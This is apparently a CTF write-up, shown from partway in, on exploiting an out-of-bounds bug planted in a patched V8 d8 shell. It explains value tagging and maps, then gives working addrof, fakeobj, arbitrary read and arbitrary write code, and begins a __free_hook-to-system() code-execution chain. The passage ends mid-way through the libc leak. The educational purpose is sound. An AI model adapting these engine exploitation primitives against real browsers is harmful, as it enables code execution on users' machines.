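function toyOob(elements, length, ...args) {
    // the C++ counts `this` as an argument, so len > 2 means more than one real argument
    if (args.length > 1) return undefined;
    if (args.length === 0) {
        return elements[length];        // read: valid indices stop at length - 1
    }
    elements[length] = Number(args[0]); // write: same index, one past the end
    return undefined;
}

// two "real" elements, plus one slot standing in for adjacent memory
const backing = new Float64Array([1.5, 2.5, 1337]);
const logicalLength = 2;

console.log(toyOob(backing, logicalLength)); // 1337
toyOob(backing, logicalLength, 42);
console.log(backing[2]);                     // 42
```

The point is that the index used is always length, never length - 1, so both branches touch the slot directly after the last valid element.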

So we have a very clear OOB vulnerability, allowing both a read and a write to one index further than the maximum length of the array. This raises an important question: what exists past the end of an array?

First, let's talk about data types in V8 and how they are represented.

Values and their Types

V8 uses pointers, doubles and smis (standing for immediate small integers). Since it has to distinguish between these values, they are all stored in memory with slight differences.

A double is stored as its 64-bit binary representation (easy)
An smi is a 32-bit number, but it's stored as itself left-shifted by 32 so the bottom 32 bits are null
- e.g. 0x12345678 is stored as 0x1234567800000000
A pointer to an address addr is stored as addr | 1, that is the least significant bit is set to 1.
- e.g. 0x12345678 is stored as 0x12345679
- This helps differentiate it from an smi, but not from a double!

Saelo's paper refers to pointers as HeapObjects as well.
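
As a quick sketch of those representations, the helpers below encode and decode them with BigInts. The function names are hypothetical (they don't come from V8 or from the original writeup), and decodeSmi only handles non-negative values.

```javascript
// Hypothetical helpers modelling the 64-bit representations described above.
function encodeSmi(n) { return BigInt(n) << 32n; }        // value lives in the top 32 bits
function decodeSmi(raw) { return Number(raw >> 32n); }    // non-negative smis only
function tagPointer(addr) { return addr | 1n; }           // set the least significant bit
function untagPointer(raw) { return raw & ~1n; }          // clear it to get the real address
function looksLikePointer(raw) { return (raw & 1n) === 1n; }

console.log(encodeSmi(0x12345678).toString(16));      // 1234567800000000
console.log(tagPointer(0x12345678n).toString(16));    // 12345679
console.log(untagPointer(0x12345679n).toString(16));  // 12345678
console.log(looksLikePointer(encodeSmi(2)));          // false
```

Note that looksLikePointer() can only separate pointers from smis. A raw double can have any bit pattern, which is exactly the ambiguity mentioned above.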

Integers in V8

Any output you get will always be in floating-point form; this is because V8 actually doesn't have a way to express 64-bit integers normally. We need a way to convert floating-point outputs to hexadecimal addresses (and vice versa!). To do this, we'll use the standard approach, which is as follows:

var buf = new ArrayBuffer(8);
var f64_buf = new Float64Array(buf);
var u64_buf = new Uint32Array(buf);

function ftoi(val) { // typeof(val) = float
    f64_buf[0] = val;
    return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
}

function itof(val) { // typeof(val) = BigInt
    u64_buf[0] = Number(val & 0xffffffffn);
    u64_buf[1] = Number(val >> 32n);
    return f64_buf[0];
}

You'll see these functions in most V8 exploits. They essentially just convert between interpreting data as floating-point form or as integers.

We're going to throw this into a javascript file exploit.js. If we want to use these functions, we can simply pass them to d8 in the command line:

./d8 --shell ./exploit.js
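
If you want to sanity-check the conversion outside d8, here's a self-contained sketch that does the same job with a DataView instead of two typed arrays. The names f2i and i2f are mine (hypothetical), chosen so they don't clash with the ftoi/itof used in the exploit.

```javascript
// Alternative sketch using DataView; f2i/i2f are hypothetical names.
const scratch = new DataView(new ArrayBuffer(8));

function f2i(val) {                     // double -> 64-bit BigInt
    scratch.setFloat64(0, val, true);   // true = little endian
    return scratch.getBigUint64(0, true);
}

function i2f(val) {                     // 64-bit BigInt -> double
    scratch.setBigUint64(0, val, true);
    return scratch.getFloat64(0, true);
}

console.log(f2i(1.5).toString(16));     // 3ff8000000000000
console.log(f2i(2.5).toString(16));     // 4004000000000000
console.log(i2f(0x3ff8000000000000n));  // 1.5
```

Passing the endianness explicitly means the result doesn't depend on the byte order of the machine, whereas the typed-array version assumes a little-endian host (true for x86-64).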

Maps

The Map is an incredibly important V8 data structure, storing key information such as

The dynamic type of the object (e.g. String, Uint8Array, etc)
The size of the object in bytes
The properties of the object and where they are stored
The type of the array elements (e.g. unboxed doubles, tagged pointers, etc)

Each javascript object is linked to a map. While the property names are usually stored in the map, the values are stored with the object itself. This allows objects with the same sort of structure to share maps, increasing efficiency.

There are three different regions that property values can be stored

Inside the object itself (inline properties)
In a separate dynamically-sized heap buffer (out-of-line properties)
If the property name is an integer index, then as array elements in a dynamically-sized heap array
- to be honest, not entirely sure what this means, but I'll get it eventually

In the first two cases, the Map stores each property of the object with a linked slot number. Each object then contains all of the property values, matching with the slot number of the relevant property. The object does not store the name of the property, only the slot number.

I promise this makes sense - for example, let's take two objects:

var object1 = {a: 20, b: 40};
var object2 = {a: 30, b: 60};

Once this is run, memory will contain two JSObject instances and one Map:

We can see that the Map stores the properties a and b, giving them the slot values 0 and 1 respectively. The two objects object1 and object2, because of their identical structure, both use Map1 as a map. The objects do not themselves know the name of the properties, only the slot values, which they assign a value to.

However, if we add another property - say c, with value 60 - to object1, they stop sharing the map:

If we then added a property c to object2, they would then share Map1 again! This works by assigning each map something called a transition table, which is just a note of which map to transition to if a property of a certain name (and possibly type) is added to it. In the example above, Map2 would make a note that if a property c is added to object2 then it should transition to use Map1.
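
The sharing and transition behaviour can be modelled with a toy sketch. ToyMap and ToyObject are invented for illustration and are far simpler than V8's real Map (no property types, no descriptors), but they show why two objects built the same way end up with the same map.

```javascript
// Toy model only: ToyMap and ToyObject are hypothetical, not V8 structures.
class ToyMap {
    constructor(slots = new Map()) {
        this.slots = slots;            // property name -> slot number
        this.transitions = new Map();  // property name -> next ToyMap
    }
    transition(name) {
        if (!this.transitions.has(name)) {
            const slots = new Map(this.slots);
            slots.set(name, slots.size);   // new property takes the next free slot
            this.transitions.set(name, new ToyMap(slots));
        }
        return this.transitions.get(name);
    }
}

class ToyObject {
    constructor(rootMap) {
        this.map = rootMap;
        this.values = [];              // values only, indexed by slot number
    }
    set(name, value) {
        if (!this.map.slots.has(name)) this.map = this.map.transition(name);
        this.values[this.map.slots.get(name)] = value;
    }
    get(name) {
        return this.values[this.map.slots.get(name)];
    }
}

const root = new ToyMap();
const toy1 = new ToyObject(root); toy1.set("a", 20); toy1.set("b", 40);
const toy2 = new ToyObject(root); toy2.set("a", 30); toy2.set("b", 60);
console.log(toy1.map === toy2.map);   // true: same structure, same map

toy1.set("c", 60);
console.log(toy1.map === toy2.map);   // false: toy1 has transitioned

toy2.set("c", 90);
console.log(toy1.map === toy2.map);   // true: toy2 followed the recorded transition
```

The objects never store property names, only values in slot order, which is the same split between map and object described above.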

Let's see how this works out in memory for arrays using the debug version of d8, along with the incredibly helpful %DebugPrint() feature that comes along with it. We'll run it under gdb so we can analyse memory as well, and make connections between all the parts.

What exists after the end of an Array?

Instead of creating our own objects, let's focus specifically on how it works for arrays, as that is what we are dealing with here.

$ gdb d8 
gef➤  run --allow-natives-syntax
V8 version 7.5.0 (candidate)
d8> a = [1.5, 2.5]
[1.5, 2.5]
d8> %DebugPrint(a)
DebugPrint: 0x30b708b4dd71: [JSArray]
 - map: 0x09bccc0c2ed9 <Map(PACKED_DOUBLE_ELEMENTS)> [FastProperties]
 - prototype: 0x2358a3991111 <JSArray[0]>
 - elements: 0x30b708b4dd51 <FixedDoubleArray[2]> [PACKED_DOUBLE_ELEMENTS]
 - length: 2
 - properties: 0x3659bdb00c71 <FixedArray[0]> {
    #length: 0x0418bc0c01a9 <AccessorInfo> (const accessor descriptor)
 }
 - elements: 0x30b708b4dd51 <FixedDoubleArray[2]> {
           0: 1.5
           1: 2.5
 }
0x9bccc0c2ed9: [Map]
 - type: JS_ARRAY_TYPE
 - instance size: 32
 - inobject properties: 0
 - elements kind: PACKED_DOUBLE_ELEMENTS
 - unused property fields: 0
 - enum length: invalid
 - back pointer: 0x09bccc0c2e89 <Map(HOLEY_SMI_ELEMENTS)>
 - prototype_validity cell: 0x0418bc0c0609 <Cell value= 1>
 - instance descriptors #1: 0x2358a3991f49 <DescriptorArray[1]>
 - layout descriptor: (nil)
 - transitions #1: 0x2358a3991eb9 <TransitionArray[4]>Transition array #1:
     0x3659bdb04ba1 <Symbol: (elements_transition_symbol)>: (transition to HOLEY_DOUBLE_ELEMENTS) -> 0x09bccc0c2f29 <Map(HOLEY_DOUBLE_ELEMENTS)>

 - prototype: 0x2358a3991111 <JSArray[0]>
 - constructor: 0x2358a3990ec1 <JSFunction Array (sfi = 0x418bc0caca1)>
 - dependent code: 0x3659bdb002c1 <Other heap object (WEAK_FIXED_ARRAY_TYPE)>
 - construction counter: 0

[1.5, 2.5]
d8>

That is a lot of information. Let's sift through the relevant parts.

Firstly, we notice that a is a type JSArray, stored in memory at 0x30b708b4dd70. The array's map is stored at 0x09bccc0c2ed8, with the properties (in this case length) stored at 0x3659bdb00c70. The elements themselves are in a FixedDoubleArray stored at 0x30b708b4dd50.

Remember pointer tagging! All the addresses are represented as addr | 1, so we have to subtract off 1 for every pointer to get the real location!

Let's view memory itself. Hit Ctrl-C and you'll go to the gef prompt. Let's view the memory at the location of the JSArray object itself, 0x30b708b4dd70.

gef➤  x/4gx 0x30b708b4dd70
0x30b708b4dd70:	0x000009bccc0c2ed9	0x00003659bdb00c71
0x30b708b4dd80:	0x000030b708b4dd51	0x0000000200000000

So the JSArray first has its pointer to its own map, then a pointer to its properties, then a pointer to its elements and then its length (note that length will be an smi, so a length of 2 is actually represented in memory as 2<<32!).

One thing that is very curious is that the elements array is actually located 0x20 bytes before the JSArray object itself in memory. Interesting! Let's view it:

gef➤  x/10gx 0x000030b708b4dd50
0x30b708b4dd50:	0x00003659bdb014f9	0x0000000200000000  <- elements (map, length)
0x30b708b4dd60:	0x3ff8000000000000	0x4004000000000000  <- array entries
0x30b708b4dd70:	0x000009bccc0c2ed9	0x00003659bdb00c71  <- JSArray
0x30b708b4dd80:	0x000030b708b4dd51	0x0000000200000000
0x30b708b4dd90:	0x00003659bdb01cc9	0x0000000400000000

Note that elements itself is a FixedDoubleArray, so the first value will be a pointer to its map at 0x00003659bdb014f8; this map doesn't concern us right now. The next value is the length of the FixedDoubleArray, the smi of 0x2 again. After this, it gets interesting.

As expected, the next two entries are the doubles representing 1.5 and 2.5, the entries in the array:

gef➤  p/f 0x3ff8000000000000
$1 = 1.5
gef➤  p/f 0x4004000000000000
$2 = 2.5

But immediately after in memory is the original JSArray. So? Well, if we have an OOB read/write to an extra index past the array, the value we are accessing is the pointer in the JSArray that points to the map. We can write to and read the map of the array.
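
We can check that claim with a bit of arithmetic on the addresses from the GDB dump above. This is just a sketch: elementAddress is a hypothetical helper, and the 0x10 header size (map plus length) is taken from the dump rather than from the V8 source.

```javascript
// Addresses below are the untagged ones from the GDB session above.
const elementsBase = 0x30b708b4dd50n;   // FixedDoubleArray
const jsArrayBase = 0x30b708b4dd70n;    // JSArray

const HEADER_SIZE = 0x10n;              // map pointer + length smi
const DOUBLE_SIZE = 0x8n;

// hypothetical helper: address of elements[index]
function elementAddress(base, index) {
    return base + HEADER_SIZE + BigInt(index) * DOUBLE_SIZE;
}

console.log(elementAddress(elementsBase, 0).toString(16)); // 30b708b4dd60
console.log(elementAddress(elementsBase, 1).toString(16)); // 30b708b4dd68
console.log(elementAddress(elementsBase, 2).toString(16)); // 30b708b4dd70
console.log(elementAddress(elementsBase, 2) === jsArrayBase); // true
```

So for this array of length 2, elements[length] lands exactly on the first field of the JSArray, which is its map pointer.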

Just to confirm this is correct, we're going to run the release version of d8 and check the output of .oob(). The reason we have to use release is that the debug version has a lot more safety and OOB checks (I assume for fuzzing purposes) so will just break if we try to use a.oob(). We need to run it with --shell exploit.js, and you'll see why in a second.

$ gdb d8 
gef➤  run --allow-natives-syntax --shell exploit.js
V8 version 7.5.0 (candidate)
d8> a = [1.5, 2.5]
[1.5, 2.5]
d8> a.oob()
2.28382032514e-310

Now we need to use our ftoi() function to convert it to a hexadecimal integer:

d8> ftoi(a.oob()).toString(16)
"2a0a9af82ed9"

Note that ftoi() only exists because of the --shell, which is why we needed it.

If our reasoning is correct, this is a pointer to the map, which is located at 0x2a0a9af82ed9. Let's compare with what GDB tells us:

d8> %DebugPrint(a)
0x2d83ee78e0b9 <JSArray[2]>
[1.5, 2.5]
d8> ^C
gef➤  x/4gx 0x2d83ee78e0b8
0x2d83ee78e0b8:	0x00002a0a9af82ed9	0x00000db811140c71
0x2d83ee78e0c8:	0x00002d83ee78e099	0x0000000200000000

The first value at the location of the JSArray is, as we saw earlier, the pointer to the map. Not only that, but we successfully read it! Look - it's 0x2a0a9af82ed9 again!

Now we know we can read and write to the map that the array uses. How do we go from here?

Abusing Map Control

Values vs Pointers

The important thing to note is that sometimes a program will store values (pass by value), and sometimes it will store a pointer to a value (pass by reference). We can abuse this functionality, because an array of doubles will store the double values themselves while an array of objects will store pointers to the objects.

This means there is an extra link in the chain - if we do array[2] on an array of doubles, V8 will go to the address in memory, read the value there, and return it. If we do array[2] on an array of objects, V8 will go to the address in memory, read the value there, go to that address in memory, and return the object placed there.

We can see this behaviour by defining two arrays, one of doubles and one of custom objects:

var float_arr = [1.5, 2.5]
var obj1 = {a: 1, b: 2}
var obj2 = {a: 5, b: 10}
var obj_arr = [obj1, obj2]

gef➤  run --allow-natives-syntax --shell exploit.js
V8 version 7.5.0 (candidate)
d8> var float_arr = [1.5, 2.5] 
undefined
d8> var obj1 = {a: 1, b: 2}
undefined
d8> var obj2 = {a: 5, b: 10}
undefined
d8> var obj_arr = [obj1, obj2]
undefined
d8> %DebugPrint(float_arr)
0x3a38af88e0c9 <JSArray[2]>
[1.5, 2.5]
d8> %DebugPrint(obj_arr)
0x3a38af8915f1 <JSArray[2]>
[{a: 1, b: 2}, {a: 5, b: 10}]

Break out to gef and see the elements of both arrays.

float_arr:

gef➤  x/4gx 0x3a38af88e0c8
0x3a38af88e0c8:	0x0000179681882ed9	0x0000389170c80c71
0x3a38af88e0d8:	0x00003a38af88e0a9	0x0000000200000000
gef➤  x/4gx 0x00003a38af88e0a8    <-- access elements array
0x3a38af88e0a8:	0x0000389170c814f9	0x0000000200000000
0x3a38af88e0b8:	0x3ff8000000000000	0x4004000000000000

Again, 1.5 and 2.5 in floating-point form.

obj_arr:

gef➤  x/4gx 0x3a38af8915f0
0x3a38af8915f0:	0x0000179681882f79	0x0000389170c80c71
0x3a38af891600:	0x00003a38af8915d1	0x0000000200000000
gef➤  x/4gx 0x00003a38af8915d0    <-- access elements array
0x3a38af8915d0:	0x0000389170c80801	0x0000000200000000
0x3a38af8915e0:	0x00003a38af8904f1	0x00003a38af8906b1

Note that the elements array in the second case has values 0x3a38af8904f1 and 0x3a38af8906b1. If our suspicions are correct, they would be pointers to the objects obj1 and obj2. Do c to continue the d8 instance, and print out the debug for the objects:

d8> %DebugPrint(obj1)
0x3a38af8904f1 <Object map = 0x17968188ab89>
{a: 1, b: 2}
d8> %DebugPrint(obj2)
0x3a38af8906b1 <Object map = 0x17968188ab89>
{a: 5, b: 10}

And look - so beautifully aligned!

Leaking Object Addresses

What happens if we overwrite the map of an object array with the map of a float array? Logic dictates that it would treat it as a double rather than a pointer, resulting in a leak of the location of obj1! Let's try it.

d8> var map_float = float_arr.oob()
d8> obj_arr.oob(map_float)
d8> ftoi(obj_arr[0]).toString(16)
"3a38af8904f1"

We leak 0x3a38af8904f1 - which is indeed the location of obj1! We therefore can leak the location of objects. We call this an addrof primitive, and we can add another function to our exploit.js to simplify it:

var float_arr = [1.5, 2.5];
var map_float = float_arr.oob();

var initial_obj = {a:1};	// placeholder object
var obj_arr = [initial_obj];
var map_obj = obj_arr.oob();

function addrof(obj) {
    obj_arr[0] = obj;			// put desired obj for address leak into index 0
    obj_arr.oob(map_float);		// change to float map
    let leak = obj_arr[0];		// read address
    obj_arr.oob(map_obj);		// change back to object map, to prevent issues down the line
    return ftoi(leak);			// return leak as an integer
}

Really importantly, the reason we can set map_obj and get the map is because obj_arr.oob() will return the value as a double, which we noted before! If it returned that object itself, the program would crash. You can see this in my Download Horsepower writeup.

We can load it up in d8 ourselves and compare the results:

$ gdb d8 
gef➤  run --allow-natives-syntax --shell exploit.js
V8 version 7.5.0 (candidate)
d8> obj = {a:1}
{a: 1}
d8> %DebugPrint(obj)
0x031afef4ebe9 <Object map = 0x3658c164ab39>
{a: 1}
d8> addrof(obj).toString(16)
"31afef4ebe9"

Perfect, it corresponds exactly!

Creating Fake Objects

The opposite of the addrof primitive is called a fakeobj primitive, and it works in the exact opposite way - we place a memory address at an index in the float array, and then change the map to that of the object array.

function fakeobj(addr) {
    float_arr[0] = itof(addr);  // place desired address into index 0
    float_arr.oob(map_obj);     // change to object map
    let fake = float_arr[0];    // get fake object
    float_arr.oob(map_float);   // swap map back
    return fake;                // return object
}
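
Since .oob() only exists in the patched d8, here's a toy model of the two primitives that runs anywhere. Everything in it is invented for illustration (toyHeap, ToyArray, the fake addresses); flipping arr.kind stands in for swapping the map with .oob().

```javascript
// Toy model only: none of these names exist in V8.
const toyHeap = new Map();    // untagged address -> object
const toyAddrs = new Map();   // object -> tagged address
let nextFree = 0x1000n;

function toyAlloc(obj) {
    toyHeap.set(nextFree, obj);
    toyAddrs.set(obj, nextFree | 1n);   // pointers are stored tagged
    nextFree += 0x20n;
    return obj;
}

class ToyArray {
    constructor(kind) { this.kind = kind; this.raw = [0n]; }  // raw 64-bit slots
    read(i) {
        // an object array dereferences the slot, a double array returns it as-is
        return this.kind === "object" ? toyHeap.get(this.raw[i] & ~1n) : this.raw[i];
    }
    write(i, v) {
        this.raw[i] = this.kind === "object" ? toyAddrs.get(v) : v;
    }
}

function toyAddrof(obj) {
    const arr = new ToyArray("object");
    arr.write(0, obj);
    arr.kind = "double";     // stands in for obj_arr.oob(map_float)
    return arr.read(0);
}

function toyFakeobj(addr) {
    const arr = new ToyArray("double");
    arr.write(0, addr);
    arr.kind = "object";     // stands in for float_arr.oob(map_obj)
    return arr.read(0);
}

const secret = toyAlloc({ a: 1 });
const leaked = toyAddrof(secret);
console.log(leaked.toString(16));            // 1001
console.log(toyFakeobj(leaked) === secret);  // true
```

The raw slot never changes in either function. Only the interpretation of it does, which is the whole trick behind both primitives.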

Arbitrary Reads

From here, an arbitrary read is relatively simple. It's important to remember that whatever fakeobj() returns is an object, not a read! So if the data there does not form a valid object, it's useless.

The trick here is to create a float array, and then make the first index a pointer to a map for the float array. We are essentially faking an array object inside the actual array. Once we call fakeobj() here, we have a valid, faked array.

But why does this help? Remember that the third memory address in a JSArray object is an elements pointer, which is a pointer to the list of values actually being stored. We can modify the elements pointer by accessing index 2 of the real array, faking the elements pointer to point to a location of our choice. Accessing index 0 of the fake array will then read from the fake pointer!

[TODO image, but not sure what exactly would help]

Because we need an index 2, we're going to make the array of size 4, as 16-byte alignment is typically nice and reduces the probability of things randomly breaking.

// array for access to arbitrary memory addresses
var arb_rw_arr = [map_float, 1.5, 2.5, 3.5];
console.log("[+] Address of Arbitrary RW Array: 0x" + addrof(arb_rw_arr).toString(16));

Now we want to start an arb_read() function. We can begin by tagging the pointer, and then placing a fakeobj at the address of the arb_rw_arr:

function arb_read(addr) {
    // tag pointer
    if (addr % 2n == 0)
        addr += 1n;

    // place a fake object over the elements FixedDoubleArray of the valid array
    let fake = fakeobj(addrof(arb_rw_arr));
}

HOWEVER - this is not quite right! We want fake to point at the first element of the FixedDoubleArray elements, so we need an offset of 0x20 bytes back (doubles are 8 bytes of space each, and we know from before that elements is just ahead of the JSArray itself in memory), so it looks like this:

function arb_read(addr) {
    // tag pointer
    if (addr % 2n == 0)
        addr += 1n;

    // place a fake object over the elements FixedDoubleArray of the valid array
    // we know the elements array is placed just ahead in memory, so with a length
    // of 4 it's an offset of 4 * 0x8 = 0x20 
    let fake = fakeobj(addrof(arb_rw_arr) - 0x20n);
}

Now we want to access arb_rw_arr[2] to overwrite the fake elements pointer in the fake array. We want to set this to the desired RW address addr, but again we need an offset! This time it's 0x10 bytes, because the first index is 0x10 bytes from the start of the object as the first 8 bytes are a map and the second 8 are the length smi:

// overwrite `elements` field of fake array with address
// we must subtract 0x10 as there are two 64-bit values
// initially with the map and a size smi, so 0x10 offset
arb_rw_arr[2] = itof(BigInt(addr) - 0x10n);

And finally we return the leak. Putting it all together:

// array for access to arbitrary memory addresses
var arb_rw_arr = [map_float, 1.5, 2.5, 3.5];
console.log("[+] Address of Arbitrary RW Array: 0x" + addrof(arb_rw_arr).toString(16));

function arb_read(addr) {
    // tag pointer
    if (addr % 2n == 0)
        addr += 1n;

    // place a fake object over the elements FixedDoubleArray of the valid array
    // we know the elements array is placed just ahead in memory, so with a length
    // of 4 it's an offset of 4 * 0x8 = 0x20 
    let fake = fakeobj(addrof(arb_rw_arr) - 0x20n);

    // overwrite `elements` field of fake array with address
    // we must subtract 0x10 as there are two 64-bit values
    // initially with the map and a size smi, so 0x10 offset
    arb_rw_arr[2] = itof(BigInt(addr) - 0x10n);

    // index 0 will return the arbitrary read value
    return ftoi(fake[0]);
}
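
The two offsets in arb_read() are easy to mix up, so here's the arithmetic as a sketch. fakeLayout is a hypothetical helper, and it assumes what we saw in GDB earlier: the elements FixedDoubleArray sits immediately before its JSArray. The address is the one printed for arb_rw_arr in one of my runs.

```javascript
const WORD = 8n; // every field and every double is 8 bytes on x64

// `fakeLayout` is a hypothetical helper; it ASSUMES the elements
// FixedDoubleArray sits immediately before its JSArray, as seen in GDB.
function fakeLayout(jsArrayAddr, length) {
    const elementsSize = (2n + BigInt(length)) * WORD;  // map + length + entries
    const elementsAddr = jsArrayAddr - elementsSize;
    const firstEntry = elementsAddr + 2n * WORD;        // skip map and length
    const fakeElementsField = firstEntry + 2n * WORD;   // fake map, fake properties, then elements
    return {
        fakeObjOffset: jsArrayAddr - firstEntry,
        elementsFieldIndex: (fakeElementsField - firstEntry) / WORD,
    };
}

const layout = fakeLayout(0x64d2a00f499n, 4);
console.log("0x" + layout.fakeObjOffset.toString(16)); // 0x20
console.log(layout.elementsFieldIndex);                // 2n
```

That gives the 0x20 subtracted from addrof(arb_rw_arr), and confirms that index 2 of the real array overlaps the elements field of the fake one.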

Arbitrary Writes

Initial Fail

Logic would dictate that we could equally get an arbitrary write using the same principle, by simply setting the value instead of returning it. Unfortunately, not quite - if we look at Faith's original writeup, the initial_arb_write() function fails:

function initial_arb_write(addr, val) {
    // place a fake object and change elements, as before
    let fake = fakeobj(addrof(arb_rw_arr) - 0x20n);
    arb_rw_arr[2] = itof(BigInt(addr) - 0x10n);

    // Write to index 0
    fake[0] = itof(BigInt(val));
}

Note that we're not explicitly accounting for pointer tagging here. This is not because it's not important, but because the way we've set up addrof and fakeobj preserves the tagging, and since we're working with static offsets of multiples of 0x10 the tag is preserved. If we tried to explicitly write to a location, we would have to tag it. If we wanted to be very thorough, we would put pointer tagging explicitly in all functions.

In the blog post they tell us they're not sure why, and go on to explain the intended method with ArrayBuffer backing pointers. In a short twitter conversation we had they tell us that

The arbitrary write doesn't work with certain addresses due to the use of floats. The overwrite had precision loss with certain addresses, but this wasn't the case with ArrayBuffer backing pointers. The code handles that differently compared to the elements ptr.

I can confirm that running the initial_arb_write() does, in fact, crash with a SIGSEGV. If anybody finds a fix, I'm sure they would be very interested (and I would too).

ArrayBuffer Backing Pointers

An ArrayBuffer is simply used to represent a generic raw binary data buffer. We combine this with the DataView object to provide a low-level interface for reading and writing multiple number types. These include the ever-useful setBigUint64(), which is where our reliability for handling the integers probably comes from.

The backing store of an ArrayBuffer is much like the elements of a JSArray, in that it points to the memory that actually stores the data. The backing store pointer sits 0x20 bytes from the start of the ArrayBuffer object in memory (which you can check with GDB).

We will have to use the initial_arb_write() to perform this singular write, and hope that the address precision is good enough (if not, we just run it again).

function arb_write(addr, val) {
    // set up ArrayBuffer and DataView objects
    let buf = new ArrayBuffer(8);
    let dataview = new DataView(buf);
    let buf_addr = addrof(buf);
    let backing_store_addr = buf_addr + 0x20n;

    // write address to backing store
    initial_arb_write(backing_store_addr, addr);
    // write data to offset 0, with little endian true
    dataview.setBigUint64(0, BigInt(val), true);
}
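
To see what the final setBigUint64() call actually does, here's a harmless sketch on an ordinary ArrayBuffer (no corrupted backing store involved). The value written is an arbitrary test pattern.

```javascript
// Plain DataView usage on a normal buffer; nothing here is exploit-specific.
const demoBuf = new ArrayBuffer(8);
const demoView = new DataView(demoBuf);

// write a 64-bit value at offset 0, little endian
demoView.setBigUint64(0, 0x4142434445464748n, true);

// the bytes land lowest-first, exactly as a pointer would be laid out on x86-64
const demoBytes = Array.from(new Uint8Array(demoBuf), b => b.toString(16));
console.log(demoBytes.join(" "));   // 48 47 46 45 44 43 42 41

// reading it back gives the exact integer, with no float conversion in between
console.log(demoView.getBigUint64(0, true) === 0x4142434445464748n); // true
```

The value stays a BigInt the whole way through, so the write itself never passes through a double. In arb_write() the only float-based step left is the single initial_arb_write() that redirects the backing store.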

Getting RCE

From here, it's similar to userland exploitation.

Overwriting __free_hook() with system()

This is the simplest approach, as any string passed to console.log() will inevitably be freed immediately afterwards. To do this, we'll need a libc leak.

In order for it to be reliable, it'll have to be through a section of memory allocated by V8 itself. We can use GDB to comb through the memory of the region that stores the maps. I'm going to get exploit.js to print out a bunch of the addresses we have. I'll then try and retrieve every single notable address I can.

console.log("[+] Float Map: 0x" + ftoi(map_float).toString(16))
console.log("[+] Object Map: 0x" + ftoi(map_obj).toString(16))

Running it multiple times, the last 4 digits are consistent, implying that they're a fixed offset:

[+] Float Map: 0x2b1dc2e82ed9
[+] Object Map: 0x2b1dc2e82f79

That bodes well. Running vmmap, we can find the region they are in:

gef➤  vmmap
[...]
0x00002b1dc2e80000 0x00002b1dc2ec0000 0x0000000000000000 rw-
[...]

So the offsets appear to be 0x2ed9 and 0x2f79. Let's throw that into exploit.js and see if that's right by running it again and again. It appears to be, but randomly there is an issue and the address is not even in assigned memory - I assume it's at least in part due to the floating-point issues.
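
As a cross-check on that offset, here's a sketch comparing two ways of getting the region start from the leaked float map. The masking version is an assumption on my part: in both runs shown in this writeup the region starts on a 0x40000 boundary, but I haven't confirmed that this always holds. The function names are hypothetical.

```javascript
const FLOAT_MAP_OFFSET = 0x2ed9n;   // offset of the float map, as found above
const REGION_MASK = ~0x3ffffn;      // ASSUMPTION: region start is 0x40000-aligned

function regionBySubtraction(mapFloat) { return mapFloat - FLOAT_MAP_OFFSET; }
function regionByMasking(mapFloat) { return mapFloat & REGION_MASK; }

// float map leaks from two separate runs in this writeup
for (const mapFloat of [0x2b1dc2e82ed9n, 0x1d8734482ed9n]) {
    console.log(
        regionBySubtraction(mapFloat).toString(16),
        regionByMasking(mapFloat).toString(16)
    );
}
// 2b1dc2e80000 2b1dc2e80000
// 1d8734480000 1d8734480000
```

If the two ever disagree, either the leak is bad or the alignment assumption is wrong, so it doubles as a cheap sanity check before doing any reads.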

Now we have that, let's try combing through the map region and see if there are any other interesting values at fixed offsets.

$ gdb ./d8 
gef➤  run --allow-natives-syntax --shell exploit.js
[+] Address of Arbitrary RW Array: 0x64d2a00f499
[+] Float Map: 0x1d8734482ed9
[+] Object Map: 0x1d8734482f79
[+] Map Region Start: 0x1d8734480000
V8 version 7.5.0 (candidate)
d8> ^C
gef➤  vmmap
[...]
0x00001d8734480000 0x00001d87344c0000 0x0000000000000000 rw- 
[...]
0x0000555555554000 0x00005555557e7000 0x0000000000000000 r-- /home/andrej/Desktop/oob-v8/v8/out.gn/x64.release/d8
0x00005555557e7000 0x00005555562af000 0x0000000000293000 r-x /home/andrej/Desktop/oob-v8/v8/out.gn/x64.release/d8
0x00005555562af000 0x00005555562ef000 0x0000000000d5b000 r-- /home/andrej/Desktop/oob-v8/v8/out.gn/x64.release/d8
0x00005555562ef000 0x00005555562f9000 0x0000000000d9b000 rw- /home/andrej/Desktop/oob-v8/v8/out.gn/x64.release/d8
0x00005555562f9000 0x00005555563c6000 0x0000000000000000 rw- [heap]
[...]
0x00007ffff7005000 0x00007ffff71ec000 0x0000000000000000 r-x /lib/x86_64-linux-gnu/libc-2.27.so
0x00007ffff71ec000 0x00007ffff73ec000 0x00000000001e7000 --- /lib/x86_64-linux-gnu/libc-2.27.so
0x00007ffff73ec000 0x00007ffff73f0000 0x00000000001e7000 r-- /lib/x86_64-linux-gnu/libc-2.27.so
0x00007ffff73f0000 0x00007ffff73f2000 0x00000000001eb000 rw- /lib/x86_64-linux-gnu/libc-2.27.so
[...]
gef➤  x/200gx 0x1d8734480000
0x1d8734480000:	0x0000000000040000	0x0000000000000004
0x1d8734480010:	0x00005555563a7f60	0x000055555631a2e0
0x1d8734480020:	0x00001d8734480000	0x0000000000040000
0x1d8734480030:	0x0000555556329b60	0x00001d8734480001
0x1d8734480040:	0x0000555556394e90	0x00001d8734480138
0x1d8734480050:	0x00001d87344c0000	0x0000000000000000
0x1d8734480060:	0x0000000000000000	0x0000000000000000
[...]

We can see that, very close to the start of the region, there appear to be two heap addresses (and more later). This makes sense, as many maps will point to areas of the heap as the heap stores dynamically-sized data.

That seems more useful than what we have right now, so let's grab that and see if the offset is constant. Right now, the offsets are 0xaef60 and 0x212e0. They appear to be constant. Let's throw those leaks in too.

let heap_leak = arb_read(map_reg_start + 0x10n);
let heap_base = heap_leak - 0xaef60n;
console.log("[+] Heap Base: 0x" + heap_base.toString(16))

It all seems to be pretty good, but a heap leak itself is not the most helpful. Let's keep digging, but looking at the heap this time, as that is probably more likely to store libc or binary addresses.

gef➤  x/200gx 0x5555562f9000
0x5555562f9000 <_ZN2v85Shell15local_counters_E+2400>:	0x0000000000000000	0x0000000000000000
0x5555562f9010 <_ZN2v85Shell15local_counters_E+2416>:	0x0000000000000000	0x0000000000000000
0x5555562f9020 <_ZN2v85Shell15local_counters_E+2432>:	0x0000000000000000	0x0000000000000000
[...]

Ok, pretty useless. What about if we actually use the heap addresses we have, and see if there's anything useful there? The first one has nothing useful, but the second:

gef➤  x/10gx 0x000055555631a2e0
0x55555631a2e0:	0x00005555562dbea8	0x0000000000001000
